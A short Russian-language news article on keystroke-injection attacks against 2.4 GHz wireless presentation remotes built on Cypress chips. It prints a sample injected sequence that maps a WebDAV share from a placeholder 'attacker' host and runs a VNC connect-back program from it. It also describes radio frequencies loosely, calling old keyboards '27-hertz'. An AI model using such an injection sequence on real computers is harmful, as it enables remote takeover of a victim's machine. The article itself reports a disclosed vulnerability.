Радиопульты для презентаций уязвимы для хакерских атак

Хакеры нашли способ удаленного взлома радиопультов для презентаций, так что теперь любой злоумышленник может перехватить управление пультом прямо во время вашего выступления.

Кроме того, через пульт можно передавать нажатия клавиш, которые будут исполнены на презентационном компьютере.

1. [Win+R]

2. net use X: http:// attacker/webdavshare

3. X:\VNCconnectback.exe

4. [enter]

Техника уже успешно проверена на пультах Logitech R-R0001 и Logitech R400 (на фото), но уязвимости подвержены и другие пульты, где используются стандартные микросхемы производства Cypress Semiconductors.

За последние пару лет опубликован большой объем литературы по безопасности радиоустройств. Известно, что 27-герцовую радиоклавиатуру можно прослушивать с помощью простого прибора, собранного в домашних условиях. Клавиатуры 2,4 ГГц взломали только в конце прошлого года. А теперь пришла очередь 2,4 ГГц устройств для управления презентациями, которые по своему принципу работы не отличаются от клавиатур. Практически во всех таких устройствах используется один и тот же 2,4-гигагерцовый чип CYRF6936 или CYRF69103 производства Cypress Semiconductors, работающий через проприетарный беспроводной протокол.

Прибор для перехвата сигнала можно сконструировать из конструктора Arduino и беспроводного модуля стоимостью 30 евро.